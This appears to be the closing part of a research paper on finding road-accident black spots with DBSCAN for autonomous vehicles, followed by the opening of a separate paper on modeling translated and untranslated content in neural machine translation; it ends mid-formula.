T'_1 = \frac{\sum_{x \in \hat{D},\ x\ \text{inside}\ \Pi} S_1(x)}{\left|\{ x \in \hat{D} \mid x\ \text{inside}\ \Pi \}\right|}   (12)

Method consistency test
It is also assumed that a black spot area identified in the t time period will also be identified as a black spot in the consecutive t̂ time period. A given black spot searching method can be considered consistent if the number of black spots identified in both periods is large, while the number of black spots identified in only one of the examined periods is small. The method consistency can be calculated with Eq. (13):

T_2 = \frac{\left|\{C_1, C_2, \dots, C_n\} \cap \{\hat{C}_1, \hat{C}_2, \dots, \hat{C}_{\hat{n}}\}\right|}{\left|\{C_1, C_2, \dots, C_n\} \,\triangle\, \{\hat{C}_1, \hat{C}_2, \dots, \hat{C}_{\hat{n}}\}\right|}   (13)

where T2 is the ratio of the number of clusters existing in both search results and the number of clusters found only by the search in the t or only in the t̂ time period (△ stands for the symmetric difference of sets). A pair of clusters from the t and t̂ periods is considered identical if the distance between them is less than 300 m.

Rank difference test
The rank difference test is based on the black spots identified in both the t and t̂ periods. The black spots of both periods are sorted by accident density, and the rank difference test measures the difference between the positions of the same cluster in the two lists. The smaller the value, the more consistent the examined method is, because the ordering of the clusters is similar; large values show that the examined method was able to identify the same black spots in both intervals but with different relative severities. Let O and Ô be the sequences of black spots identified in both periods (both sequences contain the items of the {C_1, C_2, …, C_n} ∩ {Ĉ_1, Ĉ_2, …, Ĉ_n̂} set), ordered by accident density in the t time period (O) and in the t̂ time period (Ô). Obviously |O| = |Ô|. The rank difference T3 of the examined method is given by Eq. (14):

T_3 = \frac{\sum_{c \in O} \left| \mathrm{Rank}(c, O) - \mathrm{Rank}(c, \hat{O}) \right|}{|O|}   (14)

where Rank(x, Y) is the rank of the x black spot in the Y sequence.
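The two consistency measures can be sketched as follows. The centroid-based greedy matching with the 300 m threshold is a simplification of the cluster-identity rule described above, so treat it as an assumption of this illustration rather than the exact procedure of the paper.

```python
from math import hypot

def matched_pairs(centroids_t, centroids_t_hat, max_dist=300.0):
    """Greedily pair clusters of the two periods whose centroids are within max_dist meters."""
    pairs, used = [], set()
    for i, (xi, yi) in enumerate(centroids_t):
        for j, (xj, yj) in enumerate(centroids_t_hat):
            if j not in used and hypot(xi - xj, yi - yj) <= max_dist:
                pairs.append((i, j))
                used.add(j)
                break
    return pairs

def method_consistency_T2(n_t, n_t_hat, n_matched):
    """Eq. (13): matched clusters over clusters found in only one period."""
    only_one_period = (n_t - n_matched) + (n_t_hat - n_matched)
    return n_matched / only_one_period if only_one_period else float("inf")

def rank_difference_T3(densities_t, densities_t_hat, pairs):
    """Eq. (14): mean rank difference of the matched clusters ordered by density."""
    order_t = sorted((i for i, _ in pairs), key=lambda i: -densities_t[i])
    order_h = sorted((j for _, j in pairs), key=lambda j: -densities_t_hat[j])
    rank_t = {c: r for r, c in enumerate(order_t)}
    rank_h = {c: r for r, c in enumerate(order_h)}
    return sum(abs(rank_t[i] - rank_h[j]) for i, j in pairs) / len(pairs)
```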
Evaluation results
First, the proposed method was compared to the traditional Sliding Window (SW) method using a dynamic window length. The minimal window length parameter was 250 m, the minimal accident number was 5, and the minimal accident density was 0.01 accidents/m. As a further step, the novel method was also compared to the raw DBSCAN-based clustering (without the accident factor scoring); its parameters were the same as presented above. The proposed method appears in the comparison under the name DARF (DBSCAN with Accident Reason Factor determination).

Table 3 shows the overall results for "Győr-Moson-Sopron" county.

Table 3: Results of the comparison of the SW, DBSCAN and DARF methods based on the slippery road condition. Precision is the ratio of the number of confirmed black spots (identified in both intervals) to the number of all black spots (identified in at least one of the intervals). Results are based on the personal injury accidents that occurred in "Győr-Moson-Sopron" county.
Value                             SW       DBSCAN   DARF
BS identified in both t and t̂     67       129      4
BS identified in t but not in t̂   8        36       2
BS identified in t̂ but not in t   20       23       0
Precision                         41.36%   40.69%   40.00%
T1 test result (accidents/m)      0.0094   0.0435   0.0447
T′1 test result                   0.2159   0.1922   0.6200
T2 test result                    0.5447   0.5223   0.5000
T3 test result                    3.8765   5.9054   0.2000

As visible, the number of black spots recognized by the DARF method is significantly lower than that of its alternatives. This was expected, because the SW and DBSCAN methods list all clusters where the accident density is higher than a given threshold, whereas the DARF method reports only the black spots affected by the R1 accident factor. The difference between SW and DBSCAN is also significant and is caused by the fact that SW uses road name + road section positioning, which is not available in built-up areas. In comparison, the DBSCAN method is based on GPS coordinates and can also find the black spots of municipal roads (which is one advantage of this approach). The T1 result is similar for the DBSCAN and DARF methods and significantly lower for SW. The T2 results are almost the same for all algorithms. The third general metric shows that the proposed method performs very well on the rank difference test; however, it is worth noting that the number of black spots is significantly lower in this case, which can be an advantage.

The T′1 metric shows the real strength of the proposed method. As expected, the black spots identified by SW and DBSCAN contain a mixture of various accidents; consequently, the average of their R1 scores is close to the mean of the population (0.2159 and 0.1922, compared to 0.2438). Contrary to this, the average score of the accidents of the t̂ time interval that fall inside the clusters located using the data of the t interval is 0.62, which is significantly higher than the average.

These results confirm that the proposed method has very similar characteristics to the already existing methods. The slightly lower T2 value shows that, as a raw black spot searching algorithm, it is not as robust as the alternatives. Nonetheless, the T′1 result shows that it is satisfactory for our purpose: it can localize areas where the expected number of accidents with the given accident reason is significantly higher than the average.

Table 4 shows the same values for another county ("Heves"), used as a control dataset to check the robustness of the method.

Table 4: Results of the comparison of the SW, DBSCAN and DARF methods based on the slippery road condition. Precision is defined as in Table 3. Results are based on the personal injury accidents that occurred in "Heves" county.
Value                             SW       DBSCAN   DARF
BS identified in both t and t̂     25       38       4
BS identified in t but not in t̂   9        12       0
BS identified in t̂ but not in t   16       26       3
Precision                         33.33%   33.33%   36.36%
T1 test result (accidents/m)      0.0074   0.0323   0.0732
T′1 test result                   0.2148   0.2286   0.5778
T2 test result                    0.3333   0.3333   0.4000
T3 test result                    1.8667   1.4912   0.0000

As visible, the main characteristics of the results are very similar. In this case, the T1 and T3 results are better than those of the alternatives; the T′1 value is slightly lower, but still significantly higher than the population average.

CONCLUSIONS
This work presents a novel, fully automated method for updating autonomous vehicles concerning potential road risk factors. The method is based on the DBSCAN data-mining algorithm, which can localize black spot candidates where the number of accidents is greater than expected. It has several advantages over the traditional sliding window method, especially in built-up areas and for accidents that occurred at junctions. Beyond the traditional road safety engineering work, an additional processing step was also introduced, making assumptions about the main accident reasons. All possible reasons (slippery road, pedestrian issues, etc.)
should be checked one by one, assigning score values to all accidents. The proposed method considers the distribution of these score values for the full population (all accidents of the given county) and for each black spot candidate. Using hypothesis tests (the one-tailed Welch test), it is possible to select the clusters in which the mean of the score values is significantly higher than the expected value (calculated by statistical methods based on the entire accident database). These can be considered black spots affected by the given factor. The output of this process is a list of risky locations on the public road network together with a prediction of the accident reasons. These results can be the basis of further research suggesting automatic preventive steps to autonomous vehicles. This dataset can be useful in the route planning phase (trying to avoid black spots) and in the traveling phase (taking preventive steps when approaching dangerous locations) (Alonso et al., 2016). This knowledge would decrease the number and seriousness of public road accidents.

As a limitation, it is worth noting that the proposed method can produce false positive alarms. Fortunately, these results are used by autonomous vehicles; therefore, the consequences are usually minor inconveniences (decreasing the speed, etc.), in contrast to traditional road safety investigations, where a manual revision is essential. It is also worth noting that our method is based only on local historical data, which leads to the problems typical of traditional statistical black spot searching methods (high variation compared to the expected value). It would be worth developing a hybrid method based on the Empirical Bayes method, which achieves superior control of random variation.

The next step of this research project will be the development of these preventive steps. The previously acquired information should be built into the control of the self-driven vehicle to fine-tune its strategy of movement and avoid all predictable risky situations. For example, if the presented method predicts a high probability of pedestrian accidents, the car could increase the engine sound volume; in the case of a high chance of frontal accidents, it is worth increasing the power of the headlights; and obviously, decreasing the speed near any of the dangerous locations may decrease the seriousness of most accidents. Building an expert system to give similar advice based on the historical data should be the next step of this project. Another direction of further development is to make the method more sensitive to real-time environmental conditions.
For example, if the autonomous car has to plan a route at night in wet weather, then it should pay more attention to historical accidents that occurred under similar conditions. This also confirms that simple and fully automatic algorithms are needed for this purpose, so that fast recalculations are possible. As another further development, an Artificial Intelligence based approach could be used to extend the database and address the problems raised by the limitations of the dataset.

ACKNOWLEDGEMENTS
The authors would like to thank Domokos Jankó for his support and novel ideas about the topic. Rest in peace, our friend.

ADDITIONAL INFORMATION AND DECLARATIONS

Funding
The research presented in this paper was carried out as part of the EFOP-3.6.2-16-2017-00016 project in the framework of the New Széchenyi Plan. The completion of this project is funded by the European Union and co-financed by the European Social Fund. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the authors:
New Széchenyi Plan: EFOP-3.6.2-16-2017-00016.
European Union and European Social Fund.

Competing Interests
Sándor Szénási is an Academic Editor for PeerJ.

Author Contributions
Sándor Szénási conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability:
Data and code are available in the Supplemental Files.

Supplemental Information
Supplemental information for this article can be found online at http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information.

REFERENCES
Ahad NA, Yahaya SSS. 2014. Sensitivity analysis of Welch's t-test. AIP Conference Proceedings 1605(February 2015):888–893.
Alonso F, Alonso M, Esteban C, Useche SA. 2016. Knowledge of the concepts of black spot, grey spot and high accident concentration sections among drivers. Science Publishing Group 1(4):39–46.
Anderson TK. 2009. Kernel density estimation and K-means clustering to profile road accident hotspots. Accident Analysis & Prevention 41(3):359–364 DOI 10.1016/j.aap.2008.12.014.
Andersson M, Bruzelius F, Casselgren J, Gäfvert M, Hjort M, Hultén J, Håbring F, Klomp M, Olsson G, Sjödahl M, Svendenius J, Woxneryd S, Wälivaara B. 2007. Road friction estimation. IVSS project report. Available at https://research.chalmers.se/en/publication/101026.
Bálint A, Fagerlind H, Kullgren A. 2013. A test-based method for the assessment of pre-crash warning and braking systems. Accident Analysis & Prevention 59:192–199 DOI 10.1016/j.aap.2013.05.021.
Bíl M, Andrášik R, Janoška Z. 2013. Identification of hazardous road locations of traffic accidents by means of kernel density estimation and cluster significance evaluation. Accident Analysis & Prevention 55(3):265–273 DOI 10.1016/j.aap.2013.03.003.
Carsten OM, Tate FN. 2005. Intelligent speed adaptation: accident savings and cost-benefit analysis. Accident Analysis & Prevention 37(3):407–416 DOI 10.1016/j.aap.2004.02.007.
Chatterjee K, Hounsell NB, Firmin PE, Bonsall PW. 2002. Driver response to variable message sign information in London.
Transportation Research Part C: Emerging Technologies 10(2):149–169 DOI 10.1016/S0968-090X(01)00008-0.
Cheng W, Washington SP. 2005. Experimental evaluation of hotspot identification methods. Accident Analysis & Prevention 37(5):870–881 DOI 10.1016/j.aap.2005.04.015.
Colomb M, Duthon P, Laukkanen S. 2017. Characteristics of adverse weather conditions. In: DENSE. Brussels: CER.
Delorme R, Lassarre S. 2014. A new theory of complexity for safety research—the case of the long-lasting gap in road safety outcomes between France and Great Britain. Safety Science 70:488–503 DOI 10.1016/j.ssci.2014.06.015.
Elvik R. 2008. A survey of operational definitions of hazardous road locations in some European countries. Accident Analysis & Prevention 40(6):1830–1835 DOI 10.1016/j.aap.2008.08.001.
Flahaut B, Mouchart M, Martin ES, Thomas I. 2003. The local spatial autocorrelation and the kernel method for identifying black zones. Accident Analysis & Prevention 35(6):991–1004 DOI 10.1016/S0001-4575(02)00107-0.
Geurts K, Wets G, Brijs T, Vanhoof K, Karlis D. 2006. Ranking and selecting dangerous crash locations: correcting for the number of passengers and Bayesian ranking plots. Journal of Safety Research 37(1):83–91 DOI 10.1016/j.jsr.2005.10.020.
Ghadi M, Török Á. 2019. A comparative analysis of black spot identification methods and road accident segmentation methods. Accident Analysis & Prevention 128:1–7 DOI 10.1016/j.aap.2019.03.002.
Harper CD, Hendrickson CT, Samaras C. 2016. Cost and benefit estimates of partially-automated vehicle collision avoidance technologies. Accident Analysis & Prevention 95:104–115 DOI 10.1016/j.aap.2016.06.017.
Hegyi P, Borsos A, Koren C. 2017. Searching possible accident black spot locations with accident analysis and GIS software based on GPS coordinates. Pollack Periodica 12(3):129–140 DOI 10.1556/606.2017.12.3.12.
Hossain M, Abdel-Aty M, Quddus MA, Muromachi Y, Sadeek SN. 2019. Real-time crash prediction models: state-of-the-art, design pathways and ubiquitous requirements. Accident Analysis & Prevention 124:66–84 DOI 10.1016/j.aap.2018.12.022.
Jermakian JS. 2011. Crash avoidance potential of four passenger vehicle technologies. Accident Analysis & Prevention 43(3):732–740 DOI 10.1016/j.aap.2010.10.020.
Kertesz G, Felde I. 2020. One-shot re-identification using image projections in deep triplet convolutional network. In: SOSE 2020—IEEE 15th International Conference of System of Systems Engineering, Proceedings. Piscataway: IEEE, 597–601.
Lee S, Lee Y. 2013. Calculation method for sliding-window length: a traffic accident frequency case study. Eastern Asia Society for Transportation Studies 9:1–13.
Lenard J, Badea-Romero A, Danton R. 2014. Typical pedestrian accident scenarios for the development of autonomous emergency braking test protocols.
Accident Analysis & Prevention 73(4):73–80 DOI 10.1016/j.aap.2014.08.012.
Mauro R, De Luca M, Dell'Acqua G. 2013. Using a k-means clustering algorithm to examine patterns of vehicle crashes in before-after analysis. Modern Applied Science 7(10):11–19.
Montella A. 2010. A comparative analysis of hotspot identification methods. Accident Analysis & Prevention 42(2):571–581 DOI 10.1016/j.aap.2009.09.025.
Montella A, Andreassen D, Tarko AP, Turner S, Mauriello F, Imbriani LL, Romero MA. 2013. Crash databases in Australasia, the European Union, and the United States. Transportation Research Record: Journal of the Transportation Research Board 2386(1):128–136 DOI 10.3141/2386-15.
Murray W, White J, Ison S. 2012. Work-related road safety: a case study of Roche Australia. Safety Science 50(1):129–137 DOI 10.1016/j.ssci.2011.07.012.
Nitsche P, Thomas P, Stuetz R, Welsh R. 2017. Pre-crash scenarios at road junctions: a clustering method for car crash data. Accident Analysis & Prevention 107:137–151 DOI 10.1016/j.aap.2017.07.011.
Orosz G, Mocsári T, Borsos A, Koren C. 2015. Evaluation of low-cost safety measures on the Hungarian national road network. In: Proceedings of the XXVth World Road Congress. Seoul: World Road Association, 1–11.
Rosén E, Källhammer JE, Eriksson D, Nentwich M, Fredriksson R, Smith K. 2010. Pedestrian injury mitigation by autonomous braking. Accident Analysis & Prevention 42(6):1949–1957 DOI 10.1016/j.aap.2010.05.018.
Sokolovskij E. 2010. Automobile braking and traction characteristics on the different road surfaces. Transport 22(4):275–278 DOI 10.3846/16484142.2007.9638141.
Szénási S, Jankó D. 2007. Internet-based decision-support system in the field of traffic safety on public road networks. In: 6th European Transport Conference. Budapest, 131–136.
Toran A, Moridpour S. 2015. Identifying crash black spots in Melbourne road network using kernel density estimation in GIS. In: Road Safety and Simulation.
Wallman C-G, Åström H. 2001. Friction measurement methods and the correlation between road friction and traffic safety: a literature review. Available at https://books.google.hu/books?id=VL9BHQAACAAJ.
Yu H, Liu P, Chen J, Wang H. 2014. Comparative analysis of the spatial analysis methods for hotspot identification. Accident Analysis & Prevention 66(2083):80–88 DOI 10.1016/j.aap.2014.01.017.
work_3ecslqollvat3jyruwpjy26lou ---- Modeling Past and Future for Neural Machine Translation

Zaixiang Zheng* (Nanjing University, zhengzx@nlp.nju.edu.cn), Hao Zhou* (Toutiao AI Lab, zhouhao.nlp@bytedance.com), Shujian Huang (Nanjing University, huangsj@nlp.nju.edu.cn), Lili Mou (University of Waterloo, doublepower.mou@gmail.com), Xinyu Dai (Nanjing University, dxy@nlp.nju.edu.cn), Jiajun Chen (Nanjing University, chenjj@nlp.nju.edu.cn), Zhaopeng Tu (Tencent AI Lab, zptu@tencent.com)

Abstract

Existing neural machine translation systems do not explicitly model what has been translated and what has not during the decoding phase. To address this problem, we propose a novel mechanism that separates the source information into two parts: translated PAST contents and untranslated FUTURE contents, which are modeled by two additional recurrent layers. The PAST and FUTURE contents are fed to both the attention model and the decoder states, which provides Neural Machine Translation (NMT) systems with knowledge of the translated and untranslated contents. Experimental results show that the proposed approach significantly improves the performance in Chinese-English, German-English, and English-German translation tasks.
Specifically, the proposed model outperforms the conventional coverage model in terms of both translation quality and alignment error rate.†

1 Introduction

Neural machine translation (NMT) generally adopts an encoder-decoder framework (Kalchbrenner and Blunsom, 2013; Cho et al., 2014; Sutskever et al., 2014), where the encoder summarizes the source sentence into a source context vector, and the decoder generates the target sentence word by word based on the given source. During translation, the decoder implicitly serves several functionalities at the same time:

1. Building a language model over the target sentence for translation fluency (LM).
2. Acquiring the most relevant source-side information to generate the current target word (PRESENT).
3. Maintaining what parts of the source have been translated (PAST) and what parts have not (FUTURE).

* Equal contributions.
† Our code can be downloaded from https://github.com/zhengzx-nlp/past-and-future-nmt.

However, it may be difficult for a single recurrent neural network (RNN) decoder to accomplish these functionalities simultaneously. A recent successful extension of NMT models is the attention mechanism (Bahdanau et al., 2015; Luong et al., 2015), which makes a soft selection over source words and yields an attentive vector representing the source parts most relevant to the current decoding state. In this sense, the attention mechanism separates the PRESENT functionality from the decoder RNN, achieving significant performance improvement.

In addition to PRESENT, we address the importance of modeling PAST and FUTURE contents in machine translation. The PAST contents indicate translated information, whereas the FUTURE contents indicate untranslated information; both are crucial to NMT models, especially for avoiding under-translation and over-translation (Tu et al., 2016). Ideally, PAST grows and FUTURE declines during the translation process. However, it may be difficult for a single RNN to model these processes explicitly.

In this paper, we propose a novel neural machine translation system that explicitly models PAST and FUTURE contents with two additional RNN layers. The RNN modeling the PAST contents (called the PAST layer) starts from scratch and accumulates the information that is being translated at each decoding step (i.e., the PRESENT information yielded by attention). The RNN modeling the FUTURE contents (called the FUTURE layer) begins with a holistic source summarization and subtracts the PRESENT information at each step. The two processes are guided by proposed auxiliary objectives. Intuitively, the RNN state of the PAST layer corresponds to the source contents that have been translated up to a particular step, and the RNN state of the FUTURE layer corresponds to the source contents that remain untranslated. At each decoding step, PAST and FUTURE together provide a full summarization of the source information. We then feed the PAST and FUTURE information to both the attention model and the decoder states. In this way, our proposed mechanism not only provides coverage information for the attention model, but also gives a holistic view of the source information at each step.
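To make this mechanism concrete, the sketch below (PyTorch) shows one decoding step in which separate PAST and FUTURE recurrent layers are updated with the attentive PRESENT vector and fed back into both the attention scorer and the decoder state. It is a minimal illustration under our own assumptions, not the authors' released code: the module and parameter names (PastFutureDecoderStep, attn_score, and so on) are invented for this example, plain GRU cells stand in for the paper's specialized subtraction-style FUTURE updates, and the auxiliary training objectives are omitted.

```python
import torch
import torch.nn as nn


class PastFutureDecoderStep(nn.Module):
    """One decoding step with explicit PAST and FUTURE recurrent layers (illustrative only)."""

    def __init__(self, emb_size, hidden_size, annotation_size, vocab_size):
        super().__init__()
        # Attention scores are conditioned on the decoder, PAST and FUTURE states.
        self.attn_score = nn.Linear(annotation_size + 3 * hidden_size, 1)
        self.past_cell = nn.GRUCell(annotation_size, hidden_size)    # accumulates translated content
        self.future_cell = nn.GRUCell(annotation_size, hidden_size)  # discounts translated content
        self.decoder_cell = nn.GRUCell(emb_size + annotation_size + 2 * hidden_size, hidden_size)
        self.readout = nn.Linear(hidden_size, vocab_size)

    def forward(self, y_prev_emb, s_prev, past_prev, future_prev, annotations):
        # annotations: (batch, src_len, annotation_size), the encoder states h_1 .. h_I
        batch, src_len, _ = annotations.size()

        # Attention: the query includes PAST and FUTURE, so the model knows
        # what has already been translated and what still remains.
        query = torch.cat([s_prev, past_prev, future_prev], dim=-1)        # (batch, 3*hidden)
        query = query.unsqueeze(1).expand(batch, src_len, query.size(-1))
        scores = self.attn_score(torch.cat([annotations, query], dim=-1))  # (batch, src_len, 1)
        alpha = torch.softmax(scores, dim=1)
        c_t = (alpha * annotations).sum(dim=1)                             # PRESENT source content

        # PAST grows by the content just translated; FUTURE is updated to account for it.
        past_t = self.past_cell(c_t, past_prev)
        future_t = self.future_cell(c_t, future_prev)

        # The decoder state sees PRESENT, PAST and FUTURE information.
        rnn_input = torch.cat([y_prev_emb, c_t, past_t, future_t], dim=-1)
        s_t = self.decoder_cell(rnn_input, s_prev)
        logits = self.readout(s_t)                                         # scores over target vocabulary
        return logits, s_t, past_t, future_t
```

In a full decoding loop, past_prev would start from a zero vector and future_prev from a summary of the source annotations (for example, their mean), so that PAST grows and FUTURE shrinks as translation proceeds.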
We conducted experiments on Chinese-English, German-English, and English-German benchmarks. Experiments show that the proposed mechanism yields BLEU improvements of 2.7, 1.7, and 1.1 points on the three tasks, respectively. In addition, it obtains an alignment error rate of 35.90%, significantly lower than both the baseline (39.73%) and the coverage model of Tu et al. (2016) (38.73%). We observe that in traditional attention-based NMT, most errors occur due to over- and under-translation, which is probably because the decoder RNN fails to keep track of what has been translated and what has not. Our model can alleviate such problems by explicitly modeling PAST and FUTURE contents.

2 Motivation

In this section, we first introduce the standard attention-based NMT, and then motivate our model by several empirical findings.

The attention mechanism, proposed in Bahdanau et al. (2015), yields a dynamic source context vector for the translation at a particular decoding step, modeling the PRESENT information described in Section 1. This process is illustrated in Figure 1.

[Figure 1: Architecture of attention-based NMT.]

Formally, let $x = \{x_1, \ldots, x_I\}$ be a given input sentence. The encoder RNN, generally implemented as a bi-directional RNN (Schuster and Paliwal, 1997), transforms the sentence into a sequence of annotations, with $h_i = [\overrightarrow{h}_i; \overleftarrow{h}_i]$ being the annotation of $x_i$ ($\overrightarrow{h}_i$ and $\overleftarrow{h}_i$ refer to the RNN hidden states in the forward and backward directions). Based on the source annotations, another decoder RNN generates the translation by predicting a target word $y_t$ at each time step $t$: P(yt|y